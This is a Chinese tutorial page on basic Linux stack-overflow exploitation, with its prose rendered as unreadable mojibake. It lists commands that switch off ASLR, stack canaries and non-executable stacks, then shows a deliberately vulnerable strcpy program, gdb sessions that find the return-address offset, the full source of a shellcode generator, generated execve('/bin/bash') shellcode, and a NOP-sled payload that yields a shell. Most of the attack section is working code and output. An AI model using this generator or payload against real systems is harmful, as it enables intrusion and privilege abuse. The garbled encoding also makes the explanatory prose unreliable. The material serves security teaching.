Äú¿ÉÒÔ¾èÖú£¬Ö§³ÖÎÒÃǵĹ«ÒæÊÂÒµ¡£

1Ôª 10Ôª 50Ôª





ÈÏÖ¤Â룺  ÑéÖ¤Âë,¿´²»Çå³þ?Çëµã»÷Ë¢ÐÂÑéÖ¤Âë ±ØÌî



  ÇóÖª ÎÄÕ ÎÄ¿â Lib ÊÓƵ iPerson ¿Î³Ì ÈÏÖ¤ ×Éѯ ¹¤¾ß ½²×ù Modeler   Code  
»áÔ±   
 
   
 
 
     
   
 ¶©ÔÄ
  ¾èÖú
LinuxÏ»ù±¾Õ»Òç³ö¹¥»÷
 
×÷Õߣºelite À´Ô´£º51Testing ·¢²¼ÓÚ 2015-01-06
  3142  次浏览      30
 

LinuxÕ»Òç³ö±£»¤»úÖÆ

»ù±¾µÄÕ»Òç³ö¹¥»÷£¬ÊÇ×îÔç²úÉúµÄÒ»ÖÖ»º³åÇøÒç³ö¹¥»÷·½·¨£¬ËüÊÇËùÓÐÆäËû»º³åÇøÒç³ö¹¥»÷µÄ»ù´¡¡£µ«ÊÇ£¬ÓÉÓÚÕâÖÖ¹¥»÷·½·¨²úÉúµÄʱ¼ä±È½Ï³¤£¬¹Ê¶øGCC±àÒëÆ÷¡¢Linux²Ù×÷ϵͳÌṩÁËһЩ»úÖÆÀ´×èÖ¹ÕâÖÖ¹¥»÷·½·¨¶Ôϵͳ²úÉúΣº¦¡£ÏÂÃæÊ×ÏÈÁ˽âÒ»ÏÂÏÖÓеÄÓÃÓÚ±£»¤¶ÑÕ»µÄ»úÖÆÒÔ¼°¹Ø±ÕÏàÓ¦±£»¤»úÖƵķ½·¨£¬Îª½øÒ»²½·ÖÎö»ù±¾Õ»Òç³öÌṩÁËÁ¼ºÃµÄʵÑé»·¾³¡£

1. ÄÚ´æµØÖ·Ëæ»ú»¯»úÖÆ

ÔÚUbuntuºÍÆäËû»ùÓÚLinuxÄں˵ÄϵͳÖУ¬Ä¿Ç°¶¼²ÉÓÃÄÚ´æµØÖ·Ëæ»ú»¯µÄ»úÖÆÀ´³õʼ»¯¶ÑÕ»£¬Õ⽫»áʹµÃ²Â²â¾ßÌåµÄÄÚ´æµØÖ·±äµÃÊ®·ÖÀ§ÄÑ¡£

¹Ø±ÕÄÚ´æµØÖ·Ëæ»ú»¯»úÖƵķ½·¨ÊÇ£º

sysctl ¨Cw kernel.randomize_va_space=0

2. ¿ÉÖ´ÐгÌÐòµÄÆÁ±Î±£»¤»úÖÆ

¶ÔÓÚFederalϵͳ£¬Ä¬ÈÏ»áÖ´ÐпÉÖ´ÐгÌÐòµÄÆÁ±Î±£»¤»úÖÆ£¬¸Ã»úÖƲ»ÔÊÐíÖ´Ðд洢ÔÚÕ»ÖеĴúÂ룬Õâ»áʹµÃ»º³åÇøÒç³ö¹¥»÷±äµÃÎÞЧ¡£¶øUbuntuϵͳÖÐĬÈÏûÓвÉÓÃÕâÖÖ»úÖÆ¡£

¹Ø±Õ¿ÉÖ´ÐгÌÐòµÄÆÁ±Î±£»¤»úÖƵķ½·¨ÊÇ£º

sysctl ¨Cw kernel.exec-shield=0

3. gcc±àÒëÆ÷gsÑéÖ¤Âë»úÖÆ

gcc±àÒëÆ÷רÃÅΪ·ÀÖ¹»º³åÇøÒç³ö¶ø²ÉÈ¡µÄ±£»¤´ëÊ©£¬¾ßÌå·½·¨ÊÇgccÊ×ÏÈÔÚ»º³åÇø±»Ð´Èë֮ǰÔÚbufµÄ½áÊøµØÖ·Ö®ºó·µ»ØµØַ֮ǰ·ÅÈëËæ»úµÄgsÑéÖ¤Â룬²¢ÔÚ»º³åÇøдÈë²Ù×÷½áÊøʱ¼ìÑé¸ÃÖµ¡£Í¨³£»º³åÇøÒç³ö»á´ÓµÍµØÖ·µ½¸ßµØÖ·¸²Ð´Äڴ棬ËùÒÔÈç¹ûÒª¸²Ð´·µ»ØµØÖ·£¬ÔòÐèÒª¸²Ð´¸ÃgsÑéÖ¤Âë¡£ÕâÑù¾Í¿ÉÒÔͨ¹ý±È½ÏдÈëÇ°ºÍдÈëºógsÑéÖ¤ÂëµÄÊý¾Ý£¬ÅжÏÊÇ·ñ²úÉúÒç³ö¡£

¹Ø±Õgcc±àÒëÆ÷gsÑéÖ¤Âë»úÖƵķ½·¨ÊÇ£º

ÔÚgcc±àÒëʱ²ÉÓÃ-fno-stack-protectorÑ¡Ïî¡£

4. ldÁ´½ÓÆ÷¶ÑÕ»¶Î²»¿ÉÖ´ÐлúÖÆ

ldÁ´½ÓÆ÷ÔÚÁ´½Ó³ÌÐòµÄʱºò£¬Èç¹ûËùÓеÄ.oÎļþµÄ¶ÑÕ»¶Î¶¼±ê¼ÇΪ²»¿ÉÖ´ÐУ¬ÄÇôÕû¸ö¿âµÄ¶ÑÕ»¶Î²Å»á±»±ê¼ÇΪ²»¿ÉÖ´ÐУ»Ïà·´£¬¼´Ê¹Ö»ÓÐÒ»¸ö.0ÎļþµÄ¶ÑÕ»¶Î±»±ê¼ÇΪ¿ÉÖ´ÐУ¬ÄÇôÕû¸ö¿âµÄ¶ÑÕ»¶Î½«±»±ê¼ÇΪ¿ÉÖ´ÐС£¼ì²é¶ÑÕ»¶Î¿ÉÖ´ÐÐÐԵķ½·¨ÊÇ£º

Èç¹ûÊǼì²éELF¿â£ºreadelf -lW $BIN | grep GNU_STACK²é¿´ÊÇ·ñÓÐE±ê¼Ç

Èç¹ûÊǼì²éÉú³ÉµÄ.oÎļþ£ºscanelf -e $BIN²é¿´ÊÇ·ñÓÐX±ê¼Ç

ldÁ´½ÓÆ÷Èç¹û½«¶ÑÕ»¶Î±ê¼ÇΪ²»¿ÉÖ´ÐУ¬¼´Ê¹¿ØÖÆÁËeip²úÉúÁËÌøת£¬ÒÀÈ»»á²úÉú¶Î´íÎó¡£

¹Ø±ÕldÁ´½ÓÆ÷²»¿ÉÖ´ÐлúÖƵķ½·¨ÊÇ£º

ÔÚgcc±àÒëʱ²ÉÓÃ-z execstackÑ¡Ïî¡£

»ù±¾Õ»Òç³ö¹¥»÷Ô­Àí¼°ÊµÑé

ÏÂÃ棬½«ÓÃÒ»¸öÕ»Òç³ö¹¥»÷µÄÀý×ӵķ½Ê½£¬À´ÏêϸµÄ½²½â»ù±¾µÄÕ»Òç³ö¹¥»÷µÄÏêϸ·½·¨²½Öè¡£

ÔÚ½øÐÐÊÔÑé֮ǰ£¬ÏÈÀûÓÃÉÏÃæ½²½âµÄ·½·¨£¬½«ÏàÓ¦µÄÕ»±£»¤»úÖƹرյô¡£

root@linux:~/pentest# sysctl -w kernel.randomize_va_space=0
¡¡¡¡kernel.randomize_va_space = 0
¡¡¡¡root@linux:~/pentest# sysctl -w kernel.exec-shield=0
¡¡¡¡error: "kernel.exec-shield" is an unknown key

´úÂëÈçÏ£º

root@linux:~/pentest# cat vulnerable.c
¡¡¡¡#include 
¡¡¡¡#include 
¡¡¡¡int main(int argc, char **argv) {
¡¡¡¡char buffer[500];
¡¡¡¡strcpy(buffer, argv[1]);
¡¡¡¡return 0;
¡¡¡¡}

±àÒëÔ´Â룺

root@linux:~/pentest# gcc -fno-stack-protector -z execstack -g -o vulnerable vulnerable.c

ÓÃgdbµ÷ÊԸóÌÐò£º

root@linux:~/pentest# gdb vulnerable
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
...
Reading symbols from /root/pentest/vulnerable...done.
(gdb) disass main
Dump of assembler code for function main:
0x080483c4 <+0>:   push   %ebp
0x080483c5 <+1>:   mov    %esp,%ebp
0x080483c7 <+3>:   and    {1}xfffffff0,%esp
0x080483ca <+6>:   sub    {1}x210,%esp
0x080483d0 <+12>:  mov    0xc(%ebp),%eax
0x080483d3 <+15>:  add    {1}x4,%eax
0x080483d6 <+18>:  mov    (%eax),%eax
0x080483d8 <+20>:  mov    %eax,0x4(%esp)
0x080483dc <+24>:  lea    0x1c(%esp),%eax
0x080483e0 <+28>:  mov    %eax,(%esp)
0x080483e3 <+31>:  call   0x80482f4 <strcpy@plt>
0x080483e8 <+36>:  mov    {1}x0,%eax
0x080483ed <+41>:  leave
0x080483ee <+42>:  ret
End of assembler dump.
(gdb)

´ËʱÔÚµ÷ÓÃstrcpy֮ǰ£¬mainº¯ÊýÕ»Ö¡½á¹¹·ÖÎöÈçÏÂͼËùʾ£º

¸ù¾Ý´ËʱµÄÕ»Ö¡·Ö²¼¿ÉÖª£¬ÒªÏë¿ØÖÆeipµÄÖµ£¬¾Í±ØÐëÍùbuffer[500]ÖÐÖÁÉÙÌîÈë508BµÄÄÚÈÝ¡£

½ÓÏÂÀ´ÎÒÃǼÌÐøÓÃgdbµ÷ÊÔ£º

(gdb) b *main+41
¡¡¡¡Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
¡¡¡¡(gdb) r `perl -e 'print "\x41"x508'`
¡¡¡¡Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`
¡¡¡¡Breakpoint 1, main (argc=2, argv=0xbffff264) at vulnerable.c:11
¡¡¡¡11  }
¡¡¡¡(gdb) c
¡¡¡¡Continuing.
¡¡¡¡Program exited normally.
¡¡¡¡(gdb)

ÍùbufferÖÐÌîÈë508¸ö×Ö·ûµÄÄÚÈÝ£¬³ÌÐòÕý³£½áÊø²¢Í˳ö¡£Õâ˵Ã÷Õ»²¢Ã»ÓÐÒç³ö£¬ÌîÈëÊý¾ÝÁ¿Ì«ÉÙ¡£¿ÉÊÇ£¬ÕýÈçÉÏÎÄÖÐÎÒÃÇ·ÖÎöµÄÄÇÑù£¬³ÌÐòÀíÂÛÉÏÕ»Òç³öȷʵÐèÒª508¸ö×Ö·û¾Í¿ÉÒÔÁË¡£ÎÊÌâ³öÔÚÄÄÀïÄØ£¿ÖØзÖÎö´úÂëºÍ·´»ã±àÖ®ºóµÄ´úÂ룬ÎÒÃDz»ÄÑ·¢ÏÖ£¬ÎÊÌâ²úÉúµÄÔ­ÒòÔÚÓÚ¡°0x080483c7 <+3>: and $0xfffffff0,%esp¡±ÕâÌõÓï¾ä¡£ÏÂÃæÎÒÃǽ«¼ÌÐøÓÃgdbµ÷ÊÔ£¬·ÖÎöһϸÃÓï¾äÈçºÎÓ°ÏìÎÒÃǵÄÒç³öµÄ¡£

(gdb) disass main
Dump of assembler code for function main:
0x080483c4 <+0>:   push   %ebp
0x080483c5 <+1>:   mov    %esp,%ebp
0x080483c7 <+3>:   and    {1}xfffffff0,%esp
0x080483ca <+6>:   sub    {1}x210,%esp
0x080483d0 <+12>:  mov    0xc(%ebp),%eax
0x080483d3 <+15>:  add    {1}x4,%eax
0x080483d6 <+18>:  mov    (%eax),%eax
0x080483d8 <+20>:  mov    %eax,0x4(%esp)
0x080483dc <+24>:  lea    0x1c(%esp),%eax
0x080483e0 <+28>:  mov    %eax,(%esp)
0x080483e3 <+31>:  call   0x80482f4 <strcpy@plt>
0x080483e8 <+36>:  mov    {1}x0,%eax
0x080483ed <+41>:  leave
0x080483ee <+42>:  ret
End of assembler dump.
(gdb) b *main+3
Breakpoint 2 at 0x80483c7: file vulnerable.c, line 4.
(gdb) b *main+6
Breakpoint 3 at 0x80483ca: file vulnerable.c, line 4.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`
Breakpoint 2, 0x080483c7 in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4   int main(int argc, char **argv) {
(gdb) i r esp
esp            0xbffff1b8   0xbffff1b8
(gdb) c
Continuing.
Breakpoint 3, 0x080483ca in main (argc=2, argv=0xbffff264) at vulnerable.c:4
4   int main(int argc, char **argv) {
(gdb) i r esp
esp            0xbffff1b0   0xbffff1b0
(gdb)

ͨ¹ýµ÷ÊÔ¿ÉÒÔ¿´µ½£¬ÔÚÖ´ÐС°0x080483c7 <+3>: and $0xfffffff0,%esp¡±Óï¾ä֮ǰ£¬espµÄÖµÊÇ¡°0xbffff1b8¡±£¬ÔÚÖ´ÐÐÍê¸ÃÓï¾äÖ®ºó£¬espµÄÖµÊÇ¡°0xbffff1b0¡±¡£¹ÊespµÄÖµ¼õÉÙÁË8£¬Ò²¾ÍÊÇ˵£¬ÒªÏë¿ØÖÆeipµÄÖµ£¬»¹ÐèÒª¶àÌîÈë8¸ö×Ö£¬¼´ÐèÒª516¸ö×Ö·ûÀ´Ìî³äbuffer¡£

(gdb) r `perl -e 'print "\x41"x516'`
¡¡¡¡Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`
¡¡¡¡Program received signal SIGSEGV, Segmentation fault.
¡¡¡¡0x41414141 in ?? ()
¡¡¡¡(gdb)

¿ÉÒÔ¿´µ½Òç³ö³É¹¦£¡

ÏÂÃæÎÒÃÇÓÃgdbµ÷ÊÔ£¬¿´Ò»Ð©Òç³öµÄ¹ý³Ì£¬¾ßÌå·ÖÎö¾Í²»Ð´ÁË£¬ÏàÐÅÊìϤgdbµÄ»°¶ÔÕâЩµ÷ÊÔÐÅÏ¢»áһĿÁËÈ»µÄ£º

(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x516'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x516'`
Breakpoint 1, main (argc=0, argv=0xbffff254) at vulnerable.c:11
11  }
(gdb) i r ebp
ebp            0xbffff1a8   0xbffff1a8
(gdb) i r esp
esp            0xbfffef90   0xbfffef90
(gdb) i r eip
eip            0x80483ed    0x80483ed <main+41>
(gdb) x/550bx $esp
0xbfffef90: 0xac    0xef    0xff    0xbf    0xf6    0xf3    0xff    0xbf
0xbfffef98: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xbfffefa0: 0xa4        0xf0        0xff        0xbf    0x08    0x00    0x00    0x00
0xbfffefa8: 0x3c    0xd5    0x12    0x00    0x41    0x41    0x41    0x41
0xbfffefb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbfffefb8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbfffefc0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbfffefc8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbfffefd0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbfffefd8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­¡­
0xbffff198: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff1a0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff1a8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff1b0: 0x00    0x00    0x00    0x00    0x54    0xf2
(gdb)
(gdb) stepi
0x080483ee in main (argc=0, argv=0xbffff254) at vulnerable.c:11
11  }
(gdb) i r ebp
ebp            0x41414141   0x41414141
(gdb) i r esp
esp            0xbffff1ac   0xbffff1ac
(gdb) i r eip
eip            0x80483ee    0x80483ee <main+42>
(gdb) x/10bx $esp
0xbffff1ac: 0x41    0x41    0x41    0x41    0x00    0x00    0x00    0x00
0xbffff1b4: 0x54    0xf2
(gdb) stepi
0x41414141 in ?? ()
(gdb) i r eip
eip            0x41414141   0x41414141
(gdb)

¼ÈÈ»ÎÒÃÇÒѾ­ÕÒµ½eip·µ»ØµØÖ·µÄλÖã¬ÄÇô¾Í¿ÉÒÔ¸²Ð´·µ»ØµØÖ·£¬¿ØÖƳÌÐòµÄÖ´ÐÐÁ÷³Ì¡£

½ÓÏÂÀ´£¬Ê×ÏÈÐèÒªÒ»¶Îshellcode£¬¹ØÓÚÈçºÎ±àдshellcodeµÄÎÊÌ⣬ÎÒÃÇÁôµ½ÏÂÒ»½Ú½²½â£¬ÕâÒ»½ÚÖÐÎÒÃÇʹÓÃÒ»¸ö´ÓÍøÉÏÕÒµ½µÄshellcodeÉú³É³ÌÐòÀ´Éú³ÉÒ»¶Îshellcode¡£ShellcodeÉú³É³ÌÐòÔ´ÂëΪ£º

[] Shellcode Generator null byte free. []
[] Author: certaindeath            []
[] Site: certaindeath.netii.net (at the moment under construction)   []
[] This program generates a shellcode which uses the stack to store the command (and its arguments).   []
[] Afterwords it executes the command with the system call "execve". []
[] The code is a bit knotty, so if you want to understand how it works,
 I've added an example of assembly at the end.   []
*/
#include 
#include 
#include 
#include 
#include 
#define SETRUID 0 //set this to 1 if you want the shellcode to do setreuid(0,0) before the shell command
void print_c(__u8*,int);
void push_shc(__u8*, char*, int*);
int main(int argc, char *argv[]){
char cmd[255], *a;
FILE *c;
int k=0, totl=(SETRUID ? 32:22), b,b1, i, tmp=0, shp=2;
__u8 *shc,start[2]={0x31,0xc0}, end[16]=
{0xb0,0x0b,0x89,0xf3,0x89,0xe1,0x31,0xd2,0xcd,0x80,0xb0,0x01,0x31,0xdb,0xcd,0x80}, 
struid[10]={0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x31,0xc0};
if(argc<2){
printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
"|      Shellcode Generator      |\n"
"|        by certaindeath        |\n"
"|                               |\n"
"|  Usage: ./generator      |\n"
" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
_exit(1);
}
a=(char *)malloc((9+strlen(argv[1]))*sizeof(char));
//find the command path
a[0]=0;
strcat(a, "whereis ");
strcat(a, argv[1]);
c=popen(a, "r");
while(((cmd[0]=fgetc(c))!=' ')&&(!feof(c)));
while(((cmd[k++]=fgetc(c))!=' ')&&(!feof(c)));
cmd[--k]=0;
if(k==0){
printf("No executables found for the command \"%s\".\n", argv[1]);
_exit(1);
}
if(strlen(cmd)>254){
printf("The lenght of the command path can't be over 254 bye.\n");
_exit(1);
}
for(i=2;i<argc;i++)
if(strlen(argv[i])>254){
printf("The lenght of each command argument can't be over 254 byte.\n");
_exit(1);
}
//work out the final shellcode lenght
b=(k%2);
b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
for(i=2; i<argc;i++){
k=strlen(argv[i]);
b=(k%2);
b1=(b==1) ? (((k-1)/2)%2) : ((k/2)%2);
totl+=(6+5*((k-(k%4))/4)+4*b1+7*b);
}
totl+=4*(argc-2);
printf("Shellcode lenght: %i\n", totl);
//build the shellcode
shc=(__u8 *)malloc((totl+1)*sizeof(__u8));
memcpy(shc, start, 2);
if(SETRUID){
memcpy(shc+shp, struid, 10);
shp+=10;
}
if(argc>2)
push_shc(shc, argv[argc-1], &shp);
else
push_shc(shc, cmd, &shp);
memset(shc+(shp++), 0x89, 1);
memset(shc+(shp++), 0xe6, 1);
if(argc>2){
for(i=argc-2;i>1;i--)
push_shc(shc, argv[i], &shp);
push_shc(shc, cmd, &shp);
}
memset(shc+(shp++), 0x50, 1);
memset(shc+(shp++), 0x56, 1);
if(argc>2){
for(i=argc-2;i>1;i--){
memset(shc+(shp++), 0x83, 1);
memset(shc+(shp++), 0xee, 1);
memset(shc+(shp++), strlen(argv[i])+1, 1);
memset(shc+(shp++), 0x56, 1);
}
memset(shc+(shp++), 0x83, 1);
memset(shc+(shp++), 0xee, 1);
memset(shc+(shp++), strlen(cmd)+1, 1);
memset(shc+(shp++), 0x56, 1);
}
memcpy(shc+shp, end, 16);
print_c(shc,totl);
return 0;
}
void print_c(__u8 *s,int l){
int k;

for(k=0;k<l;k++){
printf("\\x%.2x", s[k]);
if(((k+1)%8)==0) printf("\n");
}
printf("\n");
}
void push_shc(__u8 *out, char *str, int *sp){
int i=strlen(str), k, b, b1, tmp=i;
__u8 pushb_0[6]={0x83,0xec,0x01,0x88,0x04,0x24},pushb[6]={0x83,0xec,0x01,0xc6,0x04,0x24};
memcpy(out+(*sp), pushb_0, 6);
*sp+=6;
for(k=0;k((i-(i%4))/4);k++){
memset(out+((*sp)++), 0x68, 1);
tmp-=4;
memcpy(out+(*sp), str+tmp, 4);
*sp+=4;
}
b=(i%2);
b1=(b==1) ? (((i-1)/2)%2) : ((i/2)%2);
if(b1){
memset(out+((*sp)++), 0x66, 1);
memset(out+((*sp)++), 0x68, 1);
tmp-=2;
memcpy(out+(*sp), str+tmp, 2);
*sp+=2;
}
if(b){
memcpy(out+(*sp), pushb, 6);
*sp+=6;
memcpy(out+((*sp)++), str+(--tmp), 1);
}
}
/*
Here is the assembly code of a shellcode which executes the command "ls -l /dev".
This is the method used by the shellcode generator.
.global _start
_start:
xorl %eax, %eax         ;clear eax
subl $1, %esp           ; "/dev" pushed into the stack with a null byte at the end
movb %al, (%esp)
push {1}x7665642f
movl %esp, %esi         ;esp(address of "/dev") is saved in esi
subl $1, %esp           ;"-l" pushed into the stack with a null byte at the end
movb %al, (%esp)
pushw {1}x6c2d
subl $1, %esp           ;"/bin/ls" pushed into the stack with a null byte at the end
movb %al, (%esp)
push {1}x736c2f6e
pushw {1}x6962
subl $1, %esp
movb {1}x2f, (%esp)
;now the vector {"/bin/ls", "-l", "/dev", NULL} will be created into the stack
push %eax           ;the NULL pointer pushed into the stack
push %esi           ;the address of "/dev" pushed into the stack
subl $3, %esi           ;the lenght of "-l"(with a null byte) is subtracted from the address of "/dev"
push %esi           ;to find the address of "-l" and then push it into the stack
subl $8, %esi           ;the same thing is done with the address of "/bin/ls"
push %esi
movb $11, %al           ;finally the system call execve("/bin/ls", {"/bin/ls", "-l", "/dev", NULL}, 0)
movl %esi, %ebx         ;is executed
movl %esp, %ecx
xor %edx, %edx
int {1}x80
movb $1, %al            ;_exit(0);
xor %ebx, %ebx
int {1}x80
*/

ʹÓ÷½·¨ÊÇ£º

root@linux:~/pentest# gcc -o shellcode_generator shellcode_generator.c
root@linux:~/pentest# ./shellcode_generator /bin/bash
Shellcode lenght: 45
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x62\x61\x73\x68\x68\x62\x69
\x6e\x2f\x83\xec\x01\xc6\x04\x24
\x2f\x89\xe6\x50\x56\xb0\x0b\x89
\xf3\x89\xe1\x31\xd2\xcd\x80\xb0
\x01\x31\xdb\xcd\x80
root@linux:~/pentest#

ÏÖÔÚ£¬ÌṩһÖÖÌî³äbuffer¸²Ð´·µ»ØµØÖ·µÄ·½°¸£¨²»Î¨Ò»£¬Ö»ÌṩһÖÖ¿ÉÐеķ½°¸£©£º

¡°\x90¡± * 431  +  shellcode(45) +  shellcodeµØÖ·(4×Ö½Ú) * 10  ==  516B

ÆäÖУ¬¡°\x90¡±´ú±íNOP¿ÕÖ¸Á¹ÊshellcodeµØÖ·¿ÉÒÔÌ滻Ϊ×ÔbufferÆðʼµØÖ·ºÍshellcodeÆðʼµØÖ·Ö®¼äµÄÈÎÒâÒ»¸öµØÖ·¡£
¡¡¡¡µ½Ä¿Ç°ÎªÖ¹£¬ÎÒÃÇÒѾ­¹¹Ôì³öÁËÎÒÃǵÄÒç³ö´úÂ룬ÈçÏ£º

(gdb) run `perl -e 'print
"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec
\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31
\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80","\xac\xef\xff\xbf"x10'`
The program being debugged has beenstarted already.
Start it from the beginning? (y or n)y
Starting program:/root/pentest/vulnerable `perl -e 'print
"\x90"x431,"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6
\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80",
"\xac\xef\xff\xbf"x10'`
process3724 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit
Program exited normally.
(gdb)

¿ÉÒÔ¿´µ½£¬ÎÒÃǵÄÒç³ö´úÂë³É¹¦µÄÖ´ÐÐÁËshellcode£¬²¢»ñµÃÁËÏàÓ¦µÄshell¡£

µ½´ËΪֹ£¬Õ»Òç³ö¹¥»÷³É¹¦¡£

¸½£ºÓÉÓÚ%gsÑéÖ¤ÂëµÄ´æÔÚ£¬ÔÚ¿ªÆô%gsУÑéʱ£¬ÉÏÃæµÄ·½°¸Ö»ÄÜÔÚgdbµ÷ÊÔ»·¾³Ï³ɹ¦Íê³ÉÕ»Òç³ö¡£
   
3142 ´Îä¯ÀÀ       30
Ïà¹ØÎÄÕ Ïà¹ØÎĵµ Ïà¹Ø¿Î³Ì
Éî¶È½âÎö£ºÇåÀíÀôúÂë
ÈçºÎ±àд³öÓµ±§±ä»¯µÄ´úÂë
Öع¹-ʹ´úÂë¸ü¼ò½àÓÅÃÀ
ÍŶÓÏîÄ¿¿ª·¢"±àÂë¹æ·¶"ϵÁÐÎÄÕÂ
Öع¹-¸ÄÉƼÈÓдúÂëµÄÉè¼Æ
Èí¼þÖع¹v2
´úÂëÕû½àÖ®µÀ
¸ßÖÊÁ¿±à³Ì¹æ·¶
»ùÓÚHTML5¿Í»§¶Ë¡¢Web¶ËµÄÓ¦Óÿª·¢
HTML 5+CSS ¿ª·¢
ǶÈëʽC¸ßÖÊÁ¿±à³Ì
C++¸ß¼¶±à³Ì
×îл¼Æ»®
DeepSeekÔÚÈí¼þ²âÊÔÓ¦ÓÃʵ¼ù 4-12[ÔÚÏß]
DeepSeek´óÄ£ÐÍÓ¦Óÿª·¢Êµ¼ù 4-19[ÔÚÏß]
UAF¼Ü¹¹ÌåϵÓëʵ¼ù 4-11[±±¾©]
AIÖÇÄÜ»¯Èí¼þ²âÊÔ·½·¨Óëʵ¼ù 5-23[ÉϺ£]
»ùÓÚ UML ºÍEA½øÐзÖÎöÉè¼Æ 4-26[±±¾©]
ÒµÎñ¼Ü¹¹Éè¼ÆÓ뽨ģ 4-18[±±¾©]
»ùÓÚÄ£Ð͵ÄÕû³µµç×ÓµçÆø¼Ü¹¹Éè¼Æ
ǶÈëʽÉ豸É쵀 Linux ϵͳ¿ª·¢
Linux µÄ²¢·¢¿É¹ÜÀí¹¤×÷¶ÓÁÐ
ARMǶÈëʽϵͳµÄÎÊÌâ×ܽá·ÖÎö
ǶÈëʽϵͳÉè¼ÆÓëʵÀý¿ª·¢
WinCE6.0µÄEBOOT¸ÅÒª

UML +RoseRealtime+ǶÈëʽ
C++ǶÈëʽϵͳ¿ª·¢
ǶÈëʽ°×ºÐ²âÊÔ
ÊÖ»úÈí¼þ²âÊÔ
ǶÈëʽÈí¼þ²âÊÔ
ǶÈëʽ²Ù×÷ϵͳVxWorks

Öйúº½¿Õ ǶÈëʽC¸ßÖÊÁ¿±à³Ì
ʹÓÃEAºÍUML½øÐÐǶÈëʽϵͳ·ÖÎöÉè¼Æ
»ùÓÚSysMLºÍEAµÄǶÈëʽϵͳ½¨Ä£
ÉϺ£Æû³µ ǶÈëʽÈí¼þ¼Ü¹¹Éè¼Æ
±±¾© ǶÈëʽC¸ßÖÊÁ¿±à³Ì
±±¾© ¸ßÖʸßЧǶÈëʽ¿ª·¢
Nagra linuxÄÚºËÓëÉ豸Çý¶¯Ô­Àí